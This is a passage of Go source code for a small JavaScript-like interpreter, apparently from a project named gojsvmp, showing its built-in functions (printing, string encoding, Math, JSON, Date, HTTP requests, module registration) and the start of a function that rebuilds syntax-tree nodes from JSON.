		ko.Value = append(jhhi, jhhi2...)
	}
	return out
}
// CyPrint implements the cyout builtin: it prints every argument separated by
// a single space, terminates the line with "\n" and returns null.
func CyPrint(myfun *object.FunctionDeclarationObject) object.Object {
	dt := myfun.Args
	for idx, v := range dt {
		// Bug fix: the value was previously passed to fmt.Printf as the
		// *format* string, so any '%' inside it was misinterpreted as a verb.
		fmt.Print((*v).ToString())
		if idx != len(dt)-1 {
			fmt.Print(" ")
		}
	}
	fmt.Print("\n")
	return &object.NULLObject{}
}
// Input implements the input builtin: it prints all arguments as a prompt
// (space-separated, no trailing newline), then reads one line from stdin and
// returns it as a string object. On a read error an empty-typed null object
// is returned instead.
func Input(myfun *object.FunctionDeclarationObject) object.Object {
	dt := myfun.Args
	for idx, v := range dt {
		// Bug fix: the prompt value was previously passed to fmt.Printf as the
		// *format* string, so any '%' inside it was misinterpreted as a verb.
		fmt.Print((*v).ToString())
		if idx != len(dt)-1 {
			fmt.Print(" ")
		}
	}
	scanner := bufio.NewScanner(os.Stdin)
	// Read a single line of input.
	scanner.Scan()
	input := scanner.Text()
	if err := scanner.Err(); err != nil {
		fmt.Println("读取输入时发生错误:", err)
		// Bug fix: returning an untyped nil made callers that use the result
		// panic; return the interpreter's null object instead.
		return &object.NULLObject{}
	}
	// Hand the raw line back to the script.
	return &object.StringObject{Value: input}
}
// GetChar implements the cychar builtin: it returns the Unicode code point of
// the rune at the given index of a string (index defaults to 0 when omitted).
// Indexing is rune-based, not byte-based, so multi-byte characters count as
// one position. An out-of-range index panics (no bounds check here).
func GetChar(myfun *object.FunctionDeclarationObject) object.Object {
	dt := myfun.Args
	var din int
	if len(dt) == 1 {
		din = 0
	} else {
		kp := int((*dt[1]).(*object.NumericObject).Value)
		din = kp
	}
	strInfo := (*dt[0]).(*object.StringObject).Value
	runes := []rune(strInfo)
	return &object.NumericObject{
		Value: float64(runes[din]),
	}
}
// GetLength implements the len builtin: rune count for strings, element count
// for arrays and entry count for objects. Any other type yields 0.
func GetLength(myfun *object.FunctionDeclarationObject) object.Object {
	dt := myfun.Args
	kk := (*dt[0]).Type()
	switch kk {
	case token.TYSTR:
		vlue := (*dt[0]).(*object.StringObject)
		//fmt.Println(vlue.Value, len(vlue.Value), vlue.Value[0], vlue.Value[1])
		// Rune count, not byte count, so multi-byte characters count as one.
		return &object.NumericObject{Value: float64(utf8.RuneCountInString(vlue.Value))}
	case token.ArrayE:
		vlue := (*dt[0]).(*object.Environment).Value
		return &object.NumericObject{Value: float64(len(vlue))}
	case token.Object:
		vlue := (*dt[0]).(*object.Environment).Store
		return &object.NumericObject{Value: float64(len(vlue.M))}
	}
	return &object.NumericObject{Value: float64(0)}
}
// Math_Ramdom implements Math.random: a pseudo-random float64 in [0, 1).
// The generator is seeded once in Init.
func Math_Ramdom(myfun *object.FunctionDeclarationObject) object.Object {
	//dt := myfun.Args
	randomValue := rand.Float64()
	return &object.NumericObject{Value: randomValue}
}

// Math_Pow implements Math.pow(base, exponent).
func Math_Pow(myfun *object.FunctionDeclarationObject) object.Object {
	dt := myfun.Args[0]
	dte := (*dt).(*object.NumericObject).Value
	dt2 := (*myfun.Args[1]).(*object.NumericObject).Value
	dd := math.Pow(dte, dt2)
	return &object.NumericObject{Value: dd}
}

// Math_Sqrt implements Math.sqrt(x).
func Math_Sqrt(myfun *object.FunctionDeclarationObject) object.Object {
	dt := myfun.Args[0]
	dte := (*dt).(*object.NumericObject).Value
	dd := math.Sqrt(dte)
	return &object.NumericObject{Value: dd}
}
// Objecte_setPrototypeOf implements Object.setPrototypeOf(target, proto):
// the prototype chain is modelled by the environment's Outer link, so the
// second environment becomes the first one's outer scope. Returns null.
func Objecte_setPrototypeOf(myfun *object.FunctionDeclarationObject) object.Object {
	dt := myfun.Args[0]
	dtold := myfun.Args[1]
	newOne := (*dt).(*object.Environment)
	oldOne := (*dtold).(*object.Environment)
	newOne.Outer = oldOne
	return &object.NULLObject{}
}

// JSON_stringify implements JSON.stringify for array/object environments by
// delegating to parsejson.JsonToStr; the result is a string object.
func JSON_stringify(myfun *object.FunctionDeclarationObject) object.Object {
	dt := myfun.Args[0]
	newOne := (*dt).(*object.Environment)
	return parsejson.JsonToStr(newOne)
}
// CONSOLE_log implements console.log: it prints every argument separated by
// a single space, terminates the line with "\n" and returns null.
func CONSOLE_log(myfun *object.FunctionDeclarationObject) object.Object {
	for idx, v := range myfun.Args {
		// Bug fix: the value was previously passed to fmt.Printf as the
		// *format* string, so any '%' inside it was misinterpreted as a verb.
		fmt.Print((*v).ToString())
		if idx != len(myfun.Args)-1 {
			fmt.Print(" ")
		}
	}
	fmt.Print("\n")
	return &object.NULLObject{}
}
// String_fromCharCode implements String.fromCharCode: the numeric argument is
// a Unicode code point and the result is the corresponding one-character
// string, matching JavaScript semantics (fromCharCode(65) == "A").
func String_fromCharCode(myfun *object.FunctionDeclarationObject) object.Object {
	code := int((*myfun.Args[0]).(*object.NumericObject).Value)
	// Bug fix: strconv.Itoa returned the decimal digits ("65") instead of "A".
	return &object.StringObject{Value: string(rune(code))}
}
// String_strip implements String.strip(s): leading/trailing whitespace removed.
func String_strip(myfun *object.FunctionDeclarationObject) object.Object {
	dtw := (*myfun.Args[0]).(*object.StringObject).Value
	s := strings.TrimSpace(dtw)
	return &object.StringObject{Value: s}
}

// String_replace implements String.replace(s, old, new): every occurrence of
// old is replaced (global replace, -1 = no limit).
func String_replace(myfun *object.FunctionDeclarationObject) object.Object {
	dtw := (*myfun.Args[0]).(*object.StringObject).Value
	dtw2 := (*myfun.Args[1]).(*object.StringObject).Value
	dtw3 := (*myfun.Args[2]).(*object.StringObject).Value
	s := strings.Replace(dtw, dtw2, dtw3, -1)
	return &object.StringObject{Value: s}
}

// String_split implements String.split(s, sep): the pieces are returned as a
// new interpreter array of string objects.
func String_split(myfun *object.FunctionDeclarationObject) object.Object {
	dtw := (*myfun.Args[0]).(*object.StringObject).Value
	dtw2 := (*myfun.Args[1]).(*object.StringObject).Value
	allslist := strings.Split(dtw, dtw2)
	ddd := object.NewArray()
	for _, vd := range allslist {
		d := &object.StringObject{Value: vd}
		var j object.Object = d
		ddd.Value = append(ddd.Value, &j)
	}
	return &ddd
}
// String_newbyte implements String.newbyte(arr): an interpreter array of
// numbers is converted into a byte object; non-numeric elements become 0.
// Each numeric value is truncated to a single byte.
func String_newbyte(myfun *object.FunctionDeclarationObject) object.Object {
	dtw := (*myfun.Args[0]).(*object.Environment).Value
	dnnnnnn := make([]byte, len(dtw))
	for idx, dt := range dtw {
		f := (*dt).Type()
		if f == token.TYNUM {
			b := (*dt).(*object.NumericObject).Value
			dnnnnnn[idx] = byte(b)
		} else {
			// Anything that is not a number maps to a zero byte.
			dnnnnnn[idx] = 0
		}
	}
	return &object.ByteObject{Value: dnnnnnn}
}
// String_decode implements String.decode(bytes[, encoding]): a byte object is
// decoded into a string. Supported encodings: "gbk" and "utf-8" (the
// default); any other value falls back to a plain UTF-8 interpretation.
func String_decode(myfun *object.FunctionDeclarationObject) object.Object {
	dtw := (*myfun.Args[0]).(*object.ByteObject).Value
	var bian string = "utf-8"
	if len(myfun.Args) >= 2 {
		bian = (*myfun.Args[1]).(*object.StringObject).Value
	}
	if bian == "gbk" {
		decoder := simplifiedchinese.GBK.NewDecoder()
		// Decode the GBK bytes through a transforming reader.
		reader := transform.NewReader(bytes.NewReader(dtw), decoder)
		decodedBytes, _ := ioutil.ReadAll(reader)
		return &object.StringObject{Value: string(decodedBytes)}
	} else if bian == "utf-8" {
		return &object.StringObject{Value: string(dtw)}
	} else {
		// Unknown encoding: same as utf-8.
		return &object.StringObject{Value: string(dtw)}
	}
}

// String_encode implements String.encode(s[, encoding]): a string is encoded
// into a byte object. Supported encodings: "gbk" and "utf-8" (the default);
// any other value falls back to plain UTF-8 bytes.
func String_encode(myfun *object.FunctionDeclarationObject) object.Object {
	dtw := (*myfun.Args[0]).(*object.StringObject).Value
	var bian string = "utf-8"
	if len(myfun.Args) >= 2 {
		bian = (*myfun.Args[1]).(*object.StringObject).Value
	}
	if bian == "gbk" {
		encoder := simplifiedchinese.GBK.NewEncoder()
		// Encode through a transforming writer into an in-memory buffer.
		var buf bytes.Buffer
		writer := transform.NewWriter(&buf, encoder)
		writer.Write([]byte(dtw))
		writer.Close()
		byteArray := buf.Bytes()
		return &object.ByteObject{Value: byteArray}
	} else if bian == "utf-8" {
		byteArray := []byte(dtw)
		return &object.ByteObject{Value: byteArray}
	} else {
		// Unknown encoding: same as utf-8.
		byteArray := []byte(dtw)
		return &object.ByteObject{Value: byteArray}
	}
}
// Date_now implements Date.now: the current Unix time in milliseconds.
func Date_now(myfun *object.FunctionDeclarationObject) object.Object {
	currentTime := time.Now()
	timestampMillis := currentTime.UnixNano() / int64(time.Millisecond)
	return &object.NumericObject{Value: float64(timestampMillis)}
}

// Date_sleep implements Date.sleep(ms): blocks for the given number of
// milliseconds and returns null.
func Date_sleep(myfun *object.FunctionDeclarationObject) object.Object {
	dd := int((*myfun.Args[0]).(*object.NumericObject).Value)
	time.Sleep(time.Duration(dd) * time.Millisecond)
	return &object.NULLObject{}
}
// Cyhttp_toJSON is the response.json() method: it lazily parses the response
// body text into an interpreter object and memoises the result in the
// response environment under token.Jsontext.
func Cyhttp_toJSON(myfun *object.FunctionDeclarationObject) object.Object {
	dt := myfun.Env.Store
	jsdt, ok := dt.Get(token.Jsontext)
	if ok {
		// Already parsed on an earlier call — return the cached object.
		return jsdt
	}
	text, _ := dt.Get(token.Text)
	dstest := text.(*object.StringObject)
	JsonDt := parsejson.ParseStrToJson(dstest.Value)
	dt.Set(token.Jsontext, JsonDt)
	return JsonDt
}

// Cyhttp_ReHeaders is the response.headers() method: it lazily parses the raw
// response-header JSON (stored under token.Headerstext2 by Cyhttp_get/post)
// into an interpreter object, memoised under token.Headerstext.
func Cyhttp_ReHeaders(myfun *object.FunctionDeclarationObject) object.Object {
	dt := myfun.Env.Store
	jsdt, ok := dt.Get(token.Headerstext)
	if ok {
		// Already parsed on an earlier call — return the cached object.
		return jsdt
	}
	text, _ := dt.Get(token.Headerstext2)
	dstest := text.(*object.StringObject)
	JsonDt := parsejson.ParseStrToJson(dstest.Value)
	dt.Set(token.Headerstext, JsonDt)
	return JsonDt
}
// Cyhttp_get implements cyhttp.get(url[, config]): the optional config object
// may carry "headers", "timeout" (seconds, default 40), "params" (query
// string), "allow_redirects" (default true) and "proxies" (proxy URL). The
// request is delegated to http.GetHttp and the result is packaged into an
// interpreter object with status/iserror/content/text fields plus lazy
// json() and headers() methods.
func Cyhttp_get(myfun *object.FunctionDeclarationObject) object.Object {
	url := (*myfun.Args[0]).(*object.StringObject).Value
	// Substitute an empty config object when the caller omitted it.
	var huuu3 *object.Object
	if len(myfun.Args) < 2 {
		gg := object.NewObject()
		var h object.Object = &gg
		huuu3 = &h
	} else {
		huuu3 = myfun.Args[1]
	}
	timeOut := 40
	var huuu *object.Environment
	config := (*huuu3).(*object.Environment)
	huuue, ok := config.Store.Get(token.Headers)
	timeout, ok2 := config.Store.Get(token.Timeout)
	ParamsObj, ok3 := config.Store.Get(token.Params)
	Allow_redirectsTrue, ok4 := config.Store.Get(token.Allow_redirects)
	ProxiesStr, ok5 := config.Store.Get(token.Proxies)
	proxyStr := ""
	if ok5 {
		proxyStr = ProxiesStr.(*object.StringObject).Value
	}
	isAllow := true
	if ok4 {
		isAllow = Allow_redirectsTrue.(*object.BoolObject).Value
	}
	// Flatten the params object into a plain string map for the HTTP layer.
	var Params map[string]string
	if ok3 {
		Params = map[string]string{}
		gyyy := ParamsObj.(*object.Environment)
		Keys := []string{}
		for key, _ := range gyyy.Store.M {
			Keys = append(Keys, key)
		}
		for _, key2 := range Keys {
			deee, _ := gyyy.Store.Get(key2)
			Params[key2] = deee.ToString()
		}
	} else {
		Params = nil
	}
	if ok2 {
		dhhh := timeout.(*object.NumericObject).Value
		timeOut = int(dhhh)
	}
	if ok == false {
		dss := object.NewObject()
		huuu = &dss
	} else {
		huuu = (huuue).(*object.Environment)
	}
	// Flatten the headers object into a plain string map.
	headersOb := huuu.Store.M
	Keys := []string{}
	for key, _ := range headersOb {
		Keys = append(Keys, key)
	}
	headers := map[string]string{}
	for _, key2 := range Keys {
		deee, _ := huuu.Store.Get(key2)
		headers[key2] = deee.ToString()
	}
	req := http.GetHttp(url, headers, int64(timeOut), Params, isAllow, proxyStr)
	// Build the script-visible response object.
	reqdt := object.NewObject()
	reqdt.Store.Set(token.Status, &object.StringObject{Value: req.Status})
	reqdt.Store.Set(token.Iserror, &object.BoolObject{Value: req.IsError})
	reqdt.Store.Set(token.Content, &object.ByteObject{Value: req.Content})
	reqdt.Store.Set(token.Text, &object.StringObject{Value: req.Text})
	reqdt.Store.Set(token.Headerstext2, &object.StringObject{Value: req.ReHeaders})
	// Attach the lazy json() method, bound to this response environment.
	cyhttp_toJSON := Cyhttp_toJSON
	icyhttp_toJSON := new_Func(&cyhttp_toJSON)
	i2cyhttp_toJSON := icyhttp_toJSON.(*object.FunctionDeclarationObject)
	i2cyhttp_toJSON.Env = &reqdt
	reqdt.Store.Set(token.Json, i2cyhttp_toJSON)
	// Attach the lazy headers() method, bound to this response environment.
	cyhttp_ReHeaders := Cyhttp_ReHeaders
	icyhttp_ReHeaders := new_Func(&cyhttp_ReHeaders)
	i2cyhttp_ReHeaders := icyhttp_ReHeaders.(*object.FunctionDeclarationObject)
	i2cyhttp_ReHeaders.Env = &reqdt
	reqdt.Store.Set(token.Cyhttp_ReHeaders, i2cyhttp_ReHeaders)
	return &reqdt
}
// Cyhttp_post implements cyhttp.post(url[, config]): like Cyhttp_get, plus a
// request body taken from config "json" (an object, serialised to JSON with
// an Accept header) or, failing that, config "data" (stringified verbatim).
// The request is delegated to http.PostHttp and packaged into an interpreter
// object with status/iserror/content/text fields plus lazy json() and
// headers() methods.
func Cyhttp_post(myfun *object.FunctionDeclarationObject) object.Object {
	url := (*myfun.Args[0]).(*object.StringObject).Value
	// Substitute an empty config object when the caller omitted it.
	var huuu3 *object.Object
	if len(myfun.Args) < 2 {
		gg := object.NewObject()
		var h object.Object = &gg
		huuu3 = &h
	} else {
		huuu3 = myfun.Args[1]
	}
	timeOut := 40
	var huuu *object.Environment
	headers := map[string]string{}
	config := (*huuu3).(*object.Environment)
	huuue, ok := config.Store.Get(token.Headers)
	timeout, ok2 := config.Store.Get(token.Timeout)
	ParamsObj, ok3 := config.Store.Get(token.Params)
	Allow_redirectsTrue, ok4 := config.Store.Get(token.Allow_redirects)
	ProxiesStr, ok5 := config.Store.Get(token.Proxies)
	JsonObj, ok6 := config.Store.Get(token.Json)
	// Resolve the request body: "json" wins over "data".
	podata := ""
	if ok6 {
		podatjson := JsonObj.(*object.Environment)
		headers["Accept"] = "application/json"
		podata = parsejson.JsonToStr(podatjson).(*object.StringObject).Value
	} else {
		DataTest, ok7 := config.Store.Get(token.Data)
		if ok7 {
			podata = DataTest.ToString()
		}
	}
	proxyStr := ""
	if ok5 {
		proxyStr = ProxiesStr.(*object.StringObject).Value
	}
	isAllow := true
	if ok4 {
		isAllow = Allow_redirectsTrue.(*object.BoolObject).Value
	}
	// Flatten the params object into a plain string map for the HTTP layer.
	var Params map[string]string
	if ok3 {
		Params = map[string]string{}
		gyyy := ParamsObj.(*object.Environment)
		Keys := []string{}
		for key, _ := range gyyy.Store.M {
			Keys = append(Keys, key)
		}
		for _, key2 := range Keys {
			deee, _ := gyyy.Store.Get(key2)
			Params[key2] = deee.ToString()
		}
	} else {
		Params = nil
	}
	if ok2 {
		dhhh := timeout.(*object.NumericObject).Value
		timeOut = int(dhhh)
	}
	if ok == false {
		dss := object.NewObject()
		huuu = &dss
	} else {
		huuu = (huuue).(*object.Environment)
	}
	// Merge user headers into the (possibly Accept-seeded) header map.
	headersOb := huuu.Store.M
	Keys := []string{}
	for key, _ := range headersOb {
		Keys = append(Keys, key)
	}
	for _, key2 := range Keys {
		deee, _ := huuu.Store.Get(key2)
		headers[key2] = deee.ToString()
	}
	req := http.PostHttp(url, headers, int64(timeOut), Params, isAllow, proxyStr, podata)
	// Build the script-visible response object.
	reqdt := object.NewObject()
	reqdt.Store.Set(token.Status, &object.StringObject{Value: req.Status})
	reqdt.Store.Set(token.Iserror, &object.BoolObject{Value: req.IsError})
	reqdt.Store.Set(token.Text, &object.StringObject{Value: req.Text})
	reqdt.Store.Set(token.Content, &object.ByteObject{Value: req.Content})
	reqdt.Store.Set(token.Headerstext2, &object.StringObject{Value: req.ReHeaders})
	// Attach the lazy json() method, bound to this response environment.
	cyhttp_toJSON := Cyhttp_toJSON
	icyhttp_toJSON := new_Func(&cyhttp_toJSON)
	i2cyhttp_toJSON := icyhttp_toJSON.(*object.FunctionDeclarationObject)
	i2cyhttp_toJSON.Env = &reqdt
	reqdt.Store.Set(token.Json, i2cyhttp_toJSON)
	// Attach the lazy headers() method, bound to this response environment.
	cyhttp_ReHeaders := Cyhttp_ReHeaders
	icyhttp_ReHeaders := new_Func(&cyhttp_ReHeaders)
	i2cyhttp_ReHeaders := icyhttp_ReHeaders.(*object.FunctionDeclarationObject)
	i2cyhttp_ReHeaders.Env = &reqdt
	reqdt.Store.Set(token.Cyhttp_ReHeaders, i2cyhttp_ReHeaders)
	return &reqdt
}
// JSON_parse implements JSON.parse: a JSON string is converted into an
// interpreter object/array via parsejson.ParseStrToJson.
func JSON_parse(myfun *object.FunctionDeclarationObject) object.Object {
	dt := myfun.Args[0]
	jsonStr := (*dt).(*object.StringObject)
	ddd := parsejson.ParseStrToJson(jsonStr.Value)
	return ddd
}

// Objecte_keys implements Object.keys(obj): the object's own property names
// are returned as an interpreter array of strings. Map iteration order is
// unspecified, so the key order is nondeterministic.
func Objecte_keys(myfun *object.FunctionDeclarationObject) object.Object {
	dt := myfun.Args[0]
	dtInfo := (*dt).(*object.Environment)
	allk := object.NewArray()
	for key, _ := range dtInfo.Store.M {
		sko := &object.StringObject{Value: key}
		var kp object.Object = sko
		allk.Value = append(allk.Value, &kp)
	}
	return &allk
}

// NewEnv creates a fresh "this"-typed environment whose outer scope is eg
// (may be nil). Used to build the global host objects (Math, JSON, ...).
func NewEnv(eg *object.Environment) *object.Environment {
	s := object.NewSafeMap()
	env := &object.Environment{Store: s, Outer: eg, TypeInfo: token.THIS}
	return env
}

// new_Func wraps a Go function pointer into a native interpreter function
// object so it can be called from scripts.
func new_Func(ddd *func(*object.FunctionDeclarationObject) object.Object) object.Object {
	d := &object.FunctionDeclarationObject{IsNative: 1, NativeBody: ddd}
	return d
}
// Init builds the interpreter's global runtime environment. It returns:
//   - gy:   global built-in functions keyed by token name (print, input,
//     length, parseInt, ... — each wrapped via new_Func).
//   - dxhs: built-in "module" environments (Math, Object, JSON, console,
//     String, Date, Fs, Cyhttp, Etree, Re), each pre-populated with its
//     member functions.
func Init() (map[string]object.Object, map[string]*object.Environment) {
	// Seed the PRNG once so Math.random differs between runs.
	rand.Seed(time.Now().UnixNano())
	// Take addressable local copies of the builtin funcs: new_Func stores a
	// pointer, and Go function identifiers themselves are not addressable.
	getlength := GetLength
	input := Input
	cyPrint := CyPrint
	getChar := GetChar
	charToStr := CharToStr
	appendArray := AppendArray
	parseInt := ParseInt
	parseFloat := ParseFloat
	deletee := Delete
	//getToken := GetToken
	// Global function table.
	gy := make(map[string]object.Object)
	gy[token.GetLength] = new_Func(&getlength)
	gy[token.Print] = new_Func(&cyPrint)
	gy[token.GetChar] = new_Func(&getChar)
	gy[token.CharToStr] = new_Func(&charToStr)
	gy[token.AppendArray] = new_Func(&appendArray)
	gy[token.Delete] = new_Func(&deletee)
	gy[token.ParseInt] = new_Func(&parseInt)
	gy[token.ParseFloat] = new_Func(&parseFloat)
	gy[token.Input] = new_Func(&input)
	//gy[token.GetToken] = &getToken
	// Module environment table; each module is an Environment whose Store
	// maps member names to wrapped functions.
	dxhs := make(map[string]*object.Environment)
	// Math ---------------------
	Math := NewEnv(nil)
	dxhs[token.Math] = Math
	// Math_Ramdom ---------------
	math_Ramdom := Math_Ramdom
	Math.Store.Set(token.Math_random, new_Func(&math_Ramdom))
	// Math_Pow ---------------
	math_Pow := Math_Pow
	Math.Store.Set(token.Math_Pow, new_Func(&math_Pow))
	// Math_Sqrt ---------------
	math_Sqrt := Math_Sqrt
	Math.Store.Set(token.Math_Sqrt, new_Func(&math_Sqrt))
	// Object --------------------
	Object := NewEnv(nil)
	dxhs[token.Objecte] = Object
	// Object_setPrototypeOf --------------------
	objecte_setPrototypeOf := Objecte_setPrototypeOf
	Object.Store.Set(token.Objecte_setPrototypeOf, new_Func(&objecte_setPrototypeOf))
	// Object_keys --------------------
	ojecte_keys := Objecte_keys
	Object.Store.Set(token.Objecte_keys, new_Func(&ojecte_keys))
	// JSON --------------------
	JSON := NewEnv(nil)
	dxhs[token.JSON] = JSON
	// JSON_stringify --------------------
	jSON_stringify := JSON_stringify
	JSON.Store.Set(token.JSON_stringify, new_Func(&jSON_stringify))
	// JSON_parse --------------------
	jSON_parse := JSON_parse
	JSON.Store.Set(token.JSON_parse, new_Func(&jSON_parse))
	// CONSOLE --------------------
	CONSOLE := NewEnv(nil)
	dxhs[token.CONSOLE] = CONSOLE
	// CONSOLE_log --------------------
	cONSOLE_log := CONSOLE_log
	CONSOLE.Store.Set(token.CONSOLE_log, new_Func(&cONSOLE_log))
	// String --------------------
	String := NewEnv(nil)
	dxhs[token.String] = String
	// String_fromCharCode --------------------
	string_fromCharCode := String_fromCharCode
	String.Store.Set(token.String_fromCharCode, new_Func(&string_fromCharCode))
	// String_strip --------------------
	string_strip := String_strip
	String.Store.Set(token.String_strip, new_Func(&string_strip))
	// String_replace --------------------
	string_replace := String_replace
	String.Store.Set(token.String_replace, new_Func(&string_replace))
	// String_split --------------------
	string_split := String_split
	String.Store.Set(token.String_split, new_Func(&string_split))
	// String_decode --------------------
	string_decode := String_decode
	String.Store.Set(token.String_decode, new_Func(&string_decode))
	// String_encode --------------------
	string_encode := String_encode
	String.Store.Set(token.String_encode, new_Func(&string_encode))
	// String_newbyte --------------------
	string_newbyte := String_newbyte
	String.Store.Set(token.String_newbyte, new_Func(&string_newbyte))
	// Date --------------------
	Date := NewEnv(nil)
	dxhs[token.Date] = Date
	// Date_now --------------------
	date_now := Date_now
	Date.Store.Set(token.Date_now, new_Func(&date_now))
	// Date_sleep --------------------
	date_sleep := Date_sleep
	Date.Store.Set(token.Date_sleep, new_Func(&date_sleep))
	// Fs --------------------
	Fs := NewEnv(nil)
	dxhs[token.Fs] = Fs
	// Fs_open --------------------
	fs_open := fs.Fs_open
	Fs.Store.Set(token.Fs_open, new_Func(&fs_open))
	// Fs_cmd --------------------
	Fs_cmd := fs.Fs_cmd
	Fs.Store.Set(token.Fs_cmd, new_Func(&Fs_cmd))
	// Cyhttp --------------------
	Cyhttp := NewEnv(nil)
	dxhs[token.Cyhttp] = Cyhttp
	// Cyhttp_get --------------------
	cyhttp_get := Cyhttp_get
	Cyhttp.Store.Set(token.Cyhttp_get, new_Func(&cyhttp_get))
	// Cyhttp_get --------------------
	cyhttp_post := Cyhttp_post
	Cyhttp.Store.Set(token.Cyhttp_post, new_Func(&cyhttp_post))
	// Etree --------------------
	Etree := NewEnv(nil)
	dxhs[token.Etree] = Etree
	// Cyhttp_get --------------------
	etree_HTML := etree.Etree_HTML
	Etree.Store.Set(token.Etree_HTML, new_Func(&etree_HTML))
	// Re --------------------
	Re := NewEnv(nil)
	dxhs[token.Re] = Re
	// Re_findall --------------------
	re_findall := re.Re_findall
	Re.Store.Set(token.Re_findall, new_Func(&re_findall))
	// Re_findall --------------------
	re_sub := re.Re_sub
	Re.Store.Set(token.Re_sub, new_Func(&re_sub))
	return gy, dxhs
}
|
2833844911/gojsvmp | 7,822 | parseToDt/parseToDt.go | package parseToDt
import (
"encoding/json"
"fmt"
"myvmp/ast"
"myvmp/token"
)
// PrushData serializes an AST node to its JSON string form.
// A Marshal error is deliberately ignored; on failure the empty
// string is returned.
func PrushData(dt ast.Statement) string {
	encoded, _ := json.Marshal(dt)
	return string(encoded)
}
// parseAST rebuilds a concrete ast.Statement tree from the generic
// map[string]interface{} form produced by JSON-decoding a serialized AST
// (see PrushData). Dispatch is on the node's "TypeInfo" tag; an unknown
// tag yields nil. The astInfo parameter is unused but kept so existing
// callers keep compiling.
func parseAST(data map[string]interface{}, astInfo *ast.Statement) ast.Statement {
	typee := data["TypeInfo"].(string)
	switch typee {
	case token.Prog:
		// Whole program: rebuild each body statement in order.
		dt := &ast.Program{Body: make([]*ast.Statement, 0)}
		kss := data["Body"].([]interface{})
		for _, value := range kss {
			lpp := value.(map[string]interface{})
			lpm2 := parseAST(lpp, nil)
			dt.Body = append(dt.Body, &lpm2)
		}
		return dt
	case token.IDENT:
		kss := data["Name"].(string)
		dt := &ast.Identifier{Name: kss}
		return dt
	case token.NULL:
		kss := data["Value"].(string)
		dt := &ast.NullIdentifier{Value: kss}
		return dt
	case token.INT:
		// JSON numbers always decode to float64.
		kss := data["Value"].(float64)
		dt := &ast.NumericLiteral{Value: kss}
		return dt
	case token.VAR:
		dt := &ast.VariableDeclaration{Declarations: make([]*ast.Statement, 0)}
		kss := data["Declarations"].([]interface{})
		for _, value := range kss {
			lpp := value.(map[string]interface{})
			lpm2 := parseAST(lpp, nil)
			dt.Declarations = append(dt.Declarations, &lpm2)
		}
		// NOTE(review): assumes "Init" is always present for VAR nodes;
		// a nil Init would panic here — confirm against the serializer.
		dt.Init = parseAST(data["Init"].(map[string]interface{}), nil)
		return dt
	case token.Bin:
		left := parseAST(data["Left"].(map[string]interface{}), nil)
		right := parseAST(data["Right"].(map[string]interface{}), nil)
		Operator := data["Operator"].(string)
		dt := &ast.BinaryExpression{Operator: Operator, Left: left, Right: right}
		return dt
	case token.NOP:
		return &ast.NOP{}
	case token.OVER:
		return &ast.OVER{}
	case token.Ass:
		left := parseAST(data["Left"].(map[string]interface{}), nil)
		right := parseAST(data["Right"].(map[string]interface{}), nil)
		Operator := data["Operator"].(string)
		dt := &ast.AssignmentExpression{Operator: Operator, Left: left, Right: right}
		return dt
	case token.Call:
		dt := &ast.CallExpression{Arguments: make([]*ast.Statement, 0)}
		kss := data["Arguments"].([]interface{})
		for _, value := range kss {
			lpp := value.(map[string]interface{})
			lpm2 := parseAST(lpp, nil)
			dt.Arguments = append(dt.Arguments, &lpm2)
		}
		Caller := parseAST(data["Caller"].(map[string]interface{}), nil)
		dt.Caller = Caller
		return dt
	case token.IfStat:
		Test := parseAST(data["Test"].(map[string]interface{}), nil)
		Consequent := parseAST(data["Consequent"].(map[string]interface{}), nil)
		// "else" branch is optional.
		var Alternate ast.Statement
		if data["Alternate"] != nil {
			Alternate = parseAST(data["Alternate"].(map[string]interface{}), nil)
		} else {
			Alternate = nil
		}
		dt := &ast.IfStatement{Test: Test, Consequent: Consequent, Alternate: Alternate}
		return dt
	case token.Block:
		dt := &ast.BlockStatement{Body: make([]*ast.Statement, 0)}
		kss := data["Body"].([]interface{})
		for _, value := range kss {
			lpp := value.(map[string]interface{})
			lpm2 := parseAST(lpp, nil)
			dt.Body = append(dt.Body, &lpm2)
		}
		return dt
	case token.Unary:
		Argument := parseAST(data["Argument"].(map[string]interface{}), nil)
		Prefix := data["Prefix"].(bool)
		Operator := data["Operator"].(string)
		dt := &ast.UnaryExpression{
			Argument: Argument,
			Operator: Operator,
			Prefix:   Prefix,
		}
		return dt
	case token.FuncD:
		// Function declaration: name is mandatory.
		Id := parseAST(data["Id"].(map[string]interface{}), nil)
		Body := parseAST(data["Body"].(map[string]interface{}), nil)
		dt := &ast.FunctionDeclaration{Id: Id, Body: Body, Params: make([]*ast.Statement, 0)}
		kss := data["Params"].([]interface{})
		for _, value := range kss {
			lpp := value.(map[string]interface{})
			lpm2 := parseAST(lpp, nil)
			dt.Params = append(dt.Params, &lpm2)
		}
		return dt
	case token.FuncE:
		// Function expression: name is optional (anonymous functions).
		var Id ast.Statement
		if data["Id"] != nil {
			Id = parseAST(data["Id"].(map[string]interface{}), nil)
		} else {
			Id = nil
		}
		Body := parseAST(data["Body"].(map[string]interface{}), nil)
		dt := &ast.FunctionExpression{Id: Id, Body: Body, Params: make([]*ast.Statement, 0)}
		kss := data["Params"].([]interface{})
		for _, value := range kss {
			lpp := value.(map[string]interface{})
			lpm2 := parseAST(lpp, nil)
			dt.Params = append(dt.Params, &lpm2)
		}
		return dt
	case token.Member:
		Object := parseAST(data["Object"].(map[string]interface{}), nil)
		Property := parseAST(data["Property"].(map[string]interface{}), nil)
		dt := &ast.MemberExpression{
			Object:   Object,
			Property: Property,
		}
		return dt
	case token.Stri:
		kss := data["Value"].(string)
		dt := &ast.StringLiteral{
			Value: kss,
		}
		return dt
	case token.THIS:
		tthis := &ast.ThisExpression{}
		return tthis
	case token.BREAK:
		dt := &ast.BreakStatement{}
		return dt
	case token.CONTINUE:
		dt := &ast.ContinueStatement{}
		return dt
	case token.ForS:
		// Classic for-loop: init / test / update are all optional.
		var Init ast.Statement
		var Test ast.Statement
		var Updata ast.Statement
		if data["Init"] != nil {
			Init = parseAST(data["Init"].(map[string]interface{}), nil)
		}
		if data["Test"] != nil {
			Test = parseAST(data["Test"].(map[string]interface{}), nil)
		}
		if data["Updata"] != nil {
			Updata = parseAST(data["Updata"].(map[string]interface{}), nil)
		}
		Body := parseAST(data["Body"].(map[string]interface{}), nil)
		dt := &ast.ForStatement{
			Init:   Init,
			Body:   Body,
			Updata: Updata,
			Test:   Test,
		}
		return dt
	case token.ForI:
		// for-in loop.
		var Init ast.Statement
		var Test ast.Statement
		if data["Left"] != nil {
			Init = parseAST(data["Left"].(map[string]interface{}), nil)
		}
		if data["Right"] != nil {
			Test = parseAST(data["Right"].(map[string]interface{}), nil)
